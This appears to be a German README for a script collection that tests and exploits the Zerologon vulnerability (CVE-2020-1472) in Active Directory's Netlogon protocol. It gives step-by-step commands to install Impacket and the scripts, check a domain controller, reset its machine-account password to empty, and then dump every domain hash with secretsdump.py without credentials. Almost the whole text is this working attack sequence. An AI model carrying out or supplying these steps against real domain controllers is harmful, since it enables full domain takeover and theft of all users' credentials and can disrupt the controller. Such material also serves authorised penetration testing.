
Sammlung von Skripten, um die Zerologon-Schwachstelle (CVE-2020-1472) zu testen und auszunutzen.
Skriptsammlung zum Testen und Ausnutzen der Zerologon-Sicherheitslücke (CVE-2020-1472)
ZeroLogon ist eine Sicherheitslücke, die es uns ermöglicht, einen Kryptografiefehler im Microsoft Active Directory Netlogon Remote Protocol (MS-NRPC) auszunutzen, das Benutzern die Anmeldung an Servern mittels NTLM erlaubt.
Vor der Ausführung des Exploits müssen wir wissen, dass wir eine andere Version von Impacket benötigen. Dazu gehen wir wie folgt vor:
apt remove --purge impacket-scripts python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
git clone https://github.com/Nekoox/zerologon.git
cd zerologon
pip install -r requirements.txt
python3 tester.py <DC-NAME> <ip-address>
Falls der betroffene Domänencontroller anfällig ist, erscheint eine Meldung mit dem Inhalt „Erfolg! Der DC kann durch einen Zerologon-Angriff vollständig kompromittiert werden."
Andernfalls, d.h. der betroffene DC ist nicht anfällig, da das Sicherheitsloch gepatcht wurde, erhalten wir folgende Meldung: „Angriff fehlgeschlagen. Ziel ist vermutlich gepatcht."
python3 empty_pw.py <DC-NAME> <ip-address>
Wenn der Domänencontroller anfällig ist, sollte er nach Ausführung des Exploits kein Passwort haben.
> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>
Durch die Ausführung können wir alle Hashes der Domäne ohne Anmeldeinformationen sehen.